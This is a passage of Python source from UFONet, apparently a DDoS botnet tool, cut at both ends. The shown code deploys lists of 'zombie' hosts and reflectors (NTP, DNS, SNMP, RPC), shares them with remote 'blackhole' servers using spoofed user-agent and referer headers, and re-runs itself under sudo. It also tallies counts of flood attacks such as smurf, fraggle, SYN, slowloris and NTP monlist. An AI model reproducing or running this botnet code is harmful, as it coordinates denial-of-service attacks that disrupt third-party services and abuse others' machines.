nat = self.check_nat()
f = open("alien", "w") # generate random alien worker
f.write(str(self.mothership_hash))
f.close()
if self.nat_error_flag == "ON":
return
zombies = self.extract_zombies()
if not zombies:
return
attackme = self.attackme(zombies)
self.update_missions_stats() # update mothership missions stats
except Exception as e:
print ("\n[Error] [AI] Something wrong redirecting [Zombies] against you...\n")
if DEBUG == True:
traceback.print_exc()
return #sys.exit(2)
# check/update for latest stable version
if options.update:
self.banner()
try:
print("\n[AI] Trying to update automatically to the latest stable version\n")
Updater()
except:
print("Not any .git repository found!\n")
print("="*30)
print("\nTo have working this feature, you should clone UFONet with:\n")
print("$ git clone %s" % self.GIT_REPOSITORY)
print("\nAlso you can try this other mirror:\n")
print("$ git clone %s" % self.GIT_REPOSITORY2 + "\n")
# launch GUI/Web interface
if options.web:
self.create_web_interface()
return
# deploy data to share in [/var/www/ufonet]
if options.deploy is not None:
self.banner()
euid = self.checkeuid()
if euid != 0:
print("\n[Info] [AI] [Control] [DEPLOY] (--deploy) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass
try:
print("\n[AI] Trying to deploy data to share in: '"+self.warping_path+"'\n")
np = r''+self.warping_path+''
if not os.path.exists(np):
os.makedirs(np)
print("[AI] Created folder at: '"+self.warping_path+"'\n")
else:
print("[AI] Path to folder: '"+self.warping_path+"' exists! -> [PASSING!]\n")
from pathlib import Path # import pathlib
import shutil # import shutil
src = 'data/'
files=os.listdir(src)
print("[AI] GUI [Data] has been deployed...\n")
for fname in files:
shutil.copy2(os.path.join(src,fname), self.warping_path)
print(" - "+fname+" -> "+self.warping_path+"/"+fname)
os.chmod(self.warping_path+"/"+fname, self.warping_folder_permissions)
print("")
src2 = 'botnet/'
files=os.listdir(src2)
print("[AI] CORE [Botnet] has been deployed...\n")
for fname in files:
shutil.copy2(os.path.join(src2,fname), self.warping_path)
if fname == 'zombies.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"abductions.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"abductions.txt.gz")
os.chmod(self.warping_path+"/"+"abductions.txt.gz", self.warping_folder_permissions)
if fname == 'aliens.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"troops.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"troops.txt.gz")
os.chmod(self.warping_path+"/"+"troops.txt.gz", self.warping_folder_permissions)
if fname == 'droids.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"robots.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"robots.txt.gz")
os.chmod(self.warping_path+"/"+"robots.txt.gz", self.warping_folder_permissions)
if fname == 'ucavs.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"drones.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"drones.txt.gz")
os.chmod(self.warping_path+"/"+"drones.txt.gz", self.warping_folder_permissions)
if fname == 'rpcs.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"reflectors.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"reflectors.txt.gz")
os.chmod(self.warping_path+"/"+"reflectors.txt.gz", self.warping_folder_permissions)
if fname == 'snmp.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"bosons.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"bosons.txt.gz")
os.chmod(self.warping_path+"/"+"bosons.txt.gz", self.warping_folder_permissions)
if fname == 'ntp.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"crystals.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"crystals.txt.gz")
os.chmod(self.warping_path+"/"+"crystals.txt.gz", self.warping_folder_permissions)
if fname == 'dns.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"warps.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"warps.txt.gz")
os.chmod(self.warping_path+"/"+"warps.txt.gz", self.warping_folder_permissions)
if fname == 'dorks.txt':
print(" - "+fname+" -> "+self.warping_path+"/"+fname)
os.chmod(self.warping_path+"/"+fname, self.warping_folder_permissions)
print("")
print("[AI] [Info] [Control] [DEPLOY] Files are ready to be shared with other 'motherships'...\n\n[AI] [Info] [DEPLOY] Other requirements:\n")
print(" - 1) Setup web server (apache, nginx...)")
print(" - 2) Make your web server accessible from the Internet (NAT/VPS) <-> ex: 'http(s)://<your ip>/ufonet/'")
print(" - 3a) Start [Blackhole] with: './ufonet --blackhole' (or python3 ufonet --blackhole &)")
print(" - 3b) Start [Grider] with: './ufonet --grider' (or python3 ufonet --grider &)")
print(" - 4) Share your IP on the sneaknet! (ex: SHIP.RADAR) ;-)")
print("")
except Exception as e:
print("[Error] "+str(e))
print("\n[AI] Something was wrong deploying in: '/var/www/ufonet'... -> [Aborting!]\n")
# generate [Blackhole] server to share [Zombies]
if options.blackhole is not None:
self.banner()
try:
blackhole_lib = os.path.abspath(os.path.join('core/tools')) # add [Blackhole] lib
sys.path.append(blackhole_lib)
from core.tools.blackhole import BlackHole
print("\n[AI] Initiating void generation sequence...\n")
print('='*22 + '\n')
app = BlackHole()
app.start()
while True: time.sleep(1)
except KeyboardInterrupt:
print("\n[AI] Terminating void generation sequence...\n")
app.collapse()
except Exception as e:
print("[Error] "+str(e))
print("\n[AI] Something was wrong generating [Blackhole]... -> [Aborting!]\n")
# create [Grider] server to share [Stats/Wargames/Messages]
if options.grider is not None:
self.banner()
try:
grider_lib = os.path.abspath(os.path.join('core/tools')) # add [Grider] lib
sys.path.append(grider_lib)
from core.tools.grider import Grider
print("\n[AI] Initiating void generation sequence...\n")
print('='*22 + '\n')
app = Grider()
app.start()
while True: time.sleep(1)
except KeyboardInterrupt:
print("\n[AI] Terminating void generation sequence...\n")
app.collapse()
except Exception as e:
print("[Error] "+str(e))
print("\n[AI] Something was wrong generating [Grider]... -> [Aborting!]\n")
# download list of [Zombies] from a [Blackhole] IP
if options.dip is not None:
options.download = True
self.blackhole = options.dip
# upload list of [Zombies] to a [Blackhole] IP
if options.upip is not None:
options.upload = True
self.blackhole = options.upip
# download list of [Zombies] from Community server [20/01/2020 OK!]
if options.download:
try:
self.banner()
if options.dip is not None:
print(("\n[AI] Downloading list of [Zombies] from [Private] server: "+self.blackhole+" ...\n"))
else:
print("\n[AI] Downloading list of [Zombies] from [Community] server ...\n")
print('='*22 + '\n')
download_list = self.downloading_list()
except Exception as e:
print ("[Error] [AI] Something wrong downloading! -> [Exiting!]\n")
return
# upload list of [Zombies] to Community server [20/01/2020 OK!]
if options.upload:
try:
self.banner()
if options.upip is not None:
print(("\n[AI] Uploading list of [Zombies] to [Private] server: "+self.blackhole+" ...\n"))
else:
print("\n[AI] Uploading list of [Zombies] to [Community] server ...\n")
print('='*22 + '\n')
upload_list = self.uploading_list()
except Exception as e:
print(("[Error] [AI] Something wrong uploading! "+str(e)+" -> [Exiting!]\n"))
if DEBUG == True:
traceback.print_exc()
return #sys.exit(2)
# download list of [Zombies] from GitHub server [20/01/2020 OK!]
if options.download_github:
try:
self.banner()
print("\n[AI] Downloading list of [Zombies] from [GitHub] server ...\n")
print('='*22 + '\n')
download_github_list = self.downloading_github_list()
except Exception as e:
print ("[Error] [AI] Something wrong downloading! -> [Exiting!]\n")
return
# upload list of [Zombies] to GitHub server [20/01/2020 OK!]
if options.upload_github:
try:
self.banner()
print("\n[AI] Uploading 'zombies' to [GitHub] is simple. Follow the next steps:\n")
print('='*22 + '\n')
upload_github_list = self.uploading_github_list()
except Exception as e:
print(("[Error] [AI] Something wrong uploading! "+str(e)+" -> [Exiting!]\n"))
if DEBUG == True:
traceback.print_exc()
return #sys.exit(2)
# starting new zombie thread
def connect_zombies(self, zombie):
z=Zombie(self, zombie)
t = threading.Thread(target=z.connect, name=zombie)
t.start()
# single connection handling
def connect_zombie(self, zombie):
z=Zombie(self,zombie)
return z.connect()
def extract_proxy(self, proxy):
sep = ":"
proxy_ip = proxy.rsplit(sep, 1)[0]
if proxy_ip.startswith('http://'):
proxy_ip = proxy_ip.replace('http://', '')
elif proxy_ip.startswith('https://'):
proxy_ip = proxy_ip.replace('https://', '')
if proxy_ip == '127.0.0.1': # working by using 'localhost' as http proxy (privoxy, ...)
proxy_ip = 'localhost'
proxy_port = proxy.rsplit(sep, 1)[1]
proxy_url = proxy_ip + ":" + proxy_port # ex: localhost:8118
return proxy_url
def proxy_transport(self, proxy):
proxy_url = self.extract_proxy(proxy)
proxy = urllib.request.ProxyHandler({'https': proxy_url})
opener = urllib.request.build_opener(proxy)
urllib.request.install_opener(opener)
def check_mothership_chargo(self):
f = open(self.zombies_file)
self.zombies = f.readlines()
self.zombies = [zombie.replace('\n', '') for zombie in self.zombies]
self.list_zombies = []
for zombie in self.zombies:
t = urlparse(zombie)
name_zombie = t.netloc
if name_zombie == "":
name_zombie = zombie
self.list_zombies.append(name_zombie)
self.num_zombies = str(len(self.zombies))
f.close()
f = open(self.aliens_file)
self.aliens = f.readlines()
self.aliens = [alien.replace('\n', '') for alien in self.aliens]
self.list_aliens = []
for alien in self.aliens:
t = urlparse(alien)
name_alien = t.netloc
if name_alien == "":
name_alien = alien
self.list_aliens.append(name_alien)
self.num_aliens = str(len(self.aliens))
f.close()
f = open(self.droids_file)
self.droids = f.readlines()
self.droids = [droid.replace('\n', '') for droid in self.droids]
self.list_droids = []
for droid in self.droids:
t = urlparse(droid)
name_droid = t.netloc
if name_droid == "":
name_droid = droid
self.list_droids.append(name_droid)
self.num_droids = str(len(self.droids))
f.close()
f = open(self.ucavs_file)
self.ucavs = f.readlines()
self.ucavs = [ucav.replace('\n', '') for ucav in self.ucavs]
self.list_ucavs = []
for ucav in self.ucavs:
t = urlparse(ucav)
name_ucav = t.netloc
if name_ucav == "":
name_ucav = ucav
self.list_ucavs.append(name_ucav)
self.num_ucavs = str(len(self.ucavs))
f.close()
f = open(self.rpcs_file)
self.rpcs = f.readlines()
self.rpcs = [rpc.replace('\n', '') for rpc in self.rpcs]
self.list_rpcs = []
for rpc in self.rpcs:
t = urlparse(rpc)
name_rpc = t.netloc
if name_rpc == "":
name_rpc = rpc
self.list_rpcs.append(name_rpc)
self.num_rpcs = str(len(self.rpcs))
f.close()
self.total_botnet = str(int(self.num_zombies) + int(self.num_aliens) + int(self.num_droids) + int(self.num_ucavs) + int(self.num_rpcs))
return self.total_botnet
def update_flying_stats(self):
if not os.path.exists(self.mothership_stats_file) == True: # create data when no stats file (first time used)
with open(self.mothership_stats_file, "w") as f:
json.dump({"flying": "0", "missions": "0", "scanner": "0", "transferred": "0", "max_chargo": "0", "completed": "0", "loic": "0", "loris": "0", "ufosyn": "0", "spray": "0", "smurf": "0", "fraggle": "0", "xmas": "0", "ufoack": "0", "uforst": "0", "droper": "0", "overlap": "0", "pinger": "0", "ufoudp": "0", "nuke": "0", "tachyon": "0", "monlist": "0", "sniper": "0", "crashed": "0"}, f, indent=4) # starting reset
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aflying = data["flying"]
aflying = str(int(aflying) + 1) # add new flying time
data["flying"] = aflying
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_mothership_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
acompleted = data["completed"]
acompleted = str(int(acompleted) + 1) # add new completed attack
data["completed"] = acompleted
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_targets_crashed(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
tcrashed = data["crashed"]
tcrashed = str(int(tcrashed) + 1) # add new crashed target
data["crashed"] = tcrashed
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_missions_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
missions = data["missions"]
missions = str(int(missions) + 1) # add new mission target
data["missions"] = missions
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_scanner_stats(self, num):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
scanner = data["scanner"]
scanner = str(int(scanner) + int(num)) # add new zombies found by dorking to mothership stats
data["scanner"] = scanner
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_transferred_stats(self, num):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
transferred = data["transferred"]
transferred = str(int(transferred) + int(num)) # add new zombies found by downloading via blackholes to mothership stats
data["transferred"] = transferred
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_max_chargo(self, chargo):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
amax_chargo = data["max_chargo"]
if int(chargo) > int(amax_chargo): # new max chargo found
amax_chargo = chargo # add new max chargo
else:
amax_chargo = data["max_chargo"]
data["max_chargo"] = amax_chargo
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_loic_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aloic = data["loic"]
aloic = str(int(aloic) + 1) # add new loic attack to recorded stats
self.total_loic = self.total_loic + 1 # add new loic attack to session stats
data["loic"] = aloic
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_loris_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aloris = data["loris"]
aloris = str(int(aloris) + 1) # add new loris attack to recorded stats
self.total_loris = self.total_loris + 1 # add new loris attack to session stats
data["loris"] = aloris
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_ufosyn_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aufosyn = data["ufosyn"]
aufosyn = str(int(aufosyn) + 1) # add new ufosyn attack to recorded stats
self.total_syn = self.total_syn + 1 # add new ufosyn attack to session stats
data["ufosyn"] = aufosyn
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_spray_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aspray = data["spray"]
aspray = str(int(aspray) + 1) # add new spray attack to recorded stats
self.total_spray = self.total_spray + 1 # add new spray attack to session stats
data["spray"] = aspray
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_smurf_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
asmurf = data["smurf"]
asmurf = str(int(asmurf) + 1) # add new smurf attack to recorded stats
self.total_smurf = self.total_smurf + 1 # add new smurf attack to session stats
data["smurf"] = asmurf
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_fraggle_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
afraggle = data["fraggle"]
afraggle = str(int(afraggle) + 1) # add new fraggle attack to recorded stats
self.total_fraggle = self.total_fraggle + 1 # add new fraggle attack to session stats
data["fraggle"] = afraggle
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_xmas_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
axmas = data["xmas"]
axmas = str(int(axmas) + 1) # add new xmas attack to recorded stats
self.total_xmas = self.total_xmas + 1 # add new xmas attack to session stats
data["xmas"] = axmas
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_ufoack_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aufoack = data["ufoack"]
aufoack = str(int(aufoack) + 1) # add new ufoack attack to recorded stats
self.total_ufoack = self.total_ufoack + 1 # add new ufoack attack to session stats
data["ufoack"] = aufoack
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_uforst_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
auforst = data["uforst"]
auforst = str(int(auforst) + 1) # add new uforst attack to recorded stats
self.total_uforst = self.total_uforst + 1 # add new uforst attack to session stats
data["uforst"] = auforst
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_droper_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
adroper = data["droper"]
adroper = str(int(adroper) + 1) # add new droper attack to recorded stats
self.total_droper = self.total_droper + 1 # add new droper attack to session stats
data["droper"] = adroper
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_overlap_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aoverlap = data["overlap"]
aoverlap = str(int(aoverlap) + 1) # add new overlap attack to recorded stats
self.total_overlap = self.total_overlap + 1 # add new overlap attack to session stats
data["overlap"] = aoverlap
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_pinger_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
apinger = data["pinger"]
apinger = str(int(apinger) + 1) # add new pinger attack to recorded stats
self.total_pinger = self.total_pinger + 1 # add new pinger attack to session stats
data["pinger"] = apinger
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_ufoudp_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aufoudp = data["ufoudp"]
aufoudp = str(int(aufoudp) + 1) # add new ufoudp attack to recorded stats
self.total_ufoudp = self.total_ufoudp + 1 # add new ufoudp attack to session stats
data["ufoudp"] = aufoudp
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_nuke_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
anuke = data["nuke"]
anuke = str(int(anuke) + 1) # add new nuke attack to recorded stats
self.total_nuke = self.total_nuke + 1 # add new nuke attack to session stats
data["nuke"] = anuke
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_tachyon_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
atachyon = data["tachyon"]
atachyon = str(int(atachyon) + 1) # add new tachyon attack to recorded stats
self.total_tachyon = self.total_tachyon + 1 # add new tachyon attack to session stats
data["tachyon"] = atachyon
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_monlist_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
amonlist = data["monlist"]
amonlist = str(int(amonlist) + 1) # add new monlist attack to recorded stats
self.total_monlist = self.total_monlist + 1 # add new monlist attack to session stats
data["monlist"] = amonlist
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_sniper_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
asniper = data["sniper"]
asniper = str(int(asniper) + 1) # add new sniper attack to recorded stats
self.total_sniper = self.total_sniper + 1 # add new sniper attack to session stats
data["sniper"] = asniper
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def uploading_list(self):
from io import BytesIO
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
abductions = "botnet/abductions.txt.gz"
troops = "botnet/troops.txt.gz"
robots = "botnet/robots.txt.gz"
drones = "botnet/drones.txt.gz"
reflectors = "botnet/reflectors.txt.gz"
crystals = "botnet/crystals.txt.gz"
warps = "botnet/warps.txt.gz"
bosons = "botnet/bosons.txt.gz"
if self.options.timeout: # set timeout
try:
timeout = int(self.options.timeout)
except:
timeout = 5
else:
timeout = 5
if timeout < 1:
timeout = 5
try:
print("[AI] Checking integrity of [Blackhole]: "+self.blackhole+"\n")
if self.options.forcessl:
if self.options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
abductions_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
troops_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
robots_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
drones_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
reflectors_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/crystals.txt.gz', None, headers)
crystals_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/warps.txt.gz', None, headers)
warps_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/bosons.txt.gz', None, headers)
bosons_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
else:
if self.options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
abductions_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
troops_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
robots_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
drones_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
reflectors_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/crystals.txt.gz', None, headers)
crystals_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/warps.txt.gz', None, headers)
warps_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/bosons.txt.gz', None, headers)
bosons_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
if abductions_reply == "" and troops_reply == "" and robots_reply == "" and drones_reply == "" and reflectors_reply == "" and crystals_reply == "" and warps_reply == "" and bosons_reply == "":
print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX FAILED!]")
print('-'*12 + '\n')
print("[Error] [AI] Unable to uploading list of [Zombies] to this [Blackhole] [Server] -> [Exiting!]\n")
return
print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX READY!] ;-)")
f_in_abductions = gzip.open(BytesIO(abductions_reply), 'rb')
f_out_abductions = open('botnet/abductions.txt', 'wb')
f_out_abductions.write(f_in_abductions.read())
f_in_abductions.close()
f_out_abductions.close()
num_zombies = 0
with open('botnet/abductions.txt') as f:
for _ in f:
num_zombies = num_zombies + 1
print("\n[Info] [Zombies] on [Blackhole]: "+ str(num_zombies))
f_in_robots = gzip.open(BytesIO(robots_reply), 'rb')
f_out_robots = open('botnet/robots.txt', 'wb')
f_out_robots.write(f_in_robots.read())
f_in_robots.close()
f_out_robots.close()
num_robots = 0
with open('botnet/robots.txt') as f:
for _ in f:
num_robots = num_robots + 1
print("[Info] [Droids] on [Blackhole] : "+ str(num_robots))
f_in_troops = gzip.open(BytesIO(troops_reply), 'rb')
f_out_troops = open('botnet/troops.txt', 'wb')
f_out_troops.write(f_in_troops.read())
f_in_troops.close()
f_out_troops.close()
num_aliens = 0
with open('botnet/aliens.txt') as f:
for _ in f:
num_aliens = num_aliens + 1
print("[Info] [Aliens] on [Blackhole] : "+ str(num_aliens))
f_in_drones = gzip.open(BytesIO(drones_reply), 'rb')
f_out_drones = open('botnet/drones.txt', 'wb')
f_out_drones.write(f_in_drones.read())
f_in_drones.close()
f_out_drones.close()
num_drones = 0
with open('botnet/drones.txt') as f:
for _ in f:
num_drones = num_drones + 1
print("[Info] [UCAVs] on [Blackhole] : "+ str(num_drones))
f_in_reflectors = gzip.open(BytesIO(reflectors_reply), 'rb')
f_out_reflectors = open('botnet/reflectors.txt', 'wb')
f_out_reflectors.write(f_in_reflectors.read())
f_in_reflectors.close()
f_out_reflectors.close()
num_reflectors = 0
with open('botnet/reflectors.txt') as f:
for _ in f:
num_reflectors = num_reflectors + 1
print("[Info] [X-RPCs] on [Blackhole] : "+ str(num_reflectors))
f_in_crystals = gzip.open(BytesIO(crystals_reply), 'rb')
f_out_crystals = open('botnet/crystals.txt', 'wb')
f_out_crystals.write(f_in_crystals.read())
f_in_crystals.close()
f_out_crystals.close()
num_crystals = 0
with open('botnet/crystals.txt') as f:
for _ in f:
num_crystals = num_crystals + 1
print("[Info] [NTPs] on [Blackhole] : "+ str(num_crystals))
f_in_warps = gzip.open(BytesIO(warps_reply), 'rb')
f_out_warps = open('botnet/warps.txt', 'wb')
f_out_warps.write(f_in_warps.read())
f_in_warps.close()
f_out_warps.close()
num_warps = 0
with open('botnet/warps.txt') as f:
for _ in f:
num_warps = num_warps + 1
print("[Info] [DNSs] on [Blackhole] : "+ str(num_warps))
f_in_bosons = gzip.open(BytesIO(bosons_reply), 'rb')
f_out_bosons = open('botnet/bosons.txt', 'wb')
f_out_bosons.write(f_in_bosons.read())
f_in_bosons.close()
f_out_bosons.close()
num_bosons = 0
with open('botnet/bosons.txt') as f:
for _ in f:
num_bosons = num_bosons + 1
print("[Info] [SNMPs] on [Blackhole] : "+ str(num_bosons))
print('-'*12 + '\n')
if not self.options.forceyes:
update_reply = input("[AI] Do you want to merge ONLY the new [Zombies] into [Blackhole]? (Y/n)")
print('-'*25)
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
os.remove('botnet/abductions.txt') # remove abductions file
os.remove('botnet/troops.txt') # remove troops file
os.remove('botnet/robots.txt') # remove robots file
os.remove('botnet/drones.txt') # remove drones file
os.remove('botnet/reflectors.txt') # remove reflectors file
os.remove('botnet/crystals.txt') # remove crystals file
os.remove('botnet/warps.txt') # remove warps file
os.remove('botnet/bosons.txt') # remove bosons file
print("\n[Info] [AI] [Control] Aborting uploading process and cleaning temporal files... -> [Exiting!]\n")
return
else:
print("\n[AI] Checking integrity of your list of [Zombies] -> [OK!]\n") # only upload valid zombies
print('='*35)
zombies = self.extract_zombies()
if not zombies:
return
test = self.testing(zombies)
zombies_community = []
zombies_added = 0
f = open('botnet/abductions.txt')
abductions = f.readlines()
abductions = [abduction.strip() for abduction in abductions]
f.close()
fz = open(self.zombies_file)
zombies = fz.readlines()
zombies = [zombie.strip() for zombie in zombies]
fz.close()
for zombie in zombies:
if zombie not in abductions:
zombies_community.append(zombie)
zombies_added = zombies_added + 1
else:
pass
print("[Info] [AI] New [Zombies] found: " + str(zombies_added))
aliens = self.extract_aliens()
if not aliens:
return
aliens_community = []
aliens_added = 0
f = open('botnet/troops.txt')
troops = f.readlines()
troops = [troop.strip() for troop in troops]
f.close()
fz = open(self.aliens_file)
aliens = fz.readlines()
aliens = [alien.strip() for alien in aliens]
fz.close()
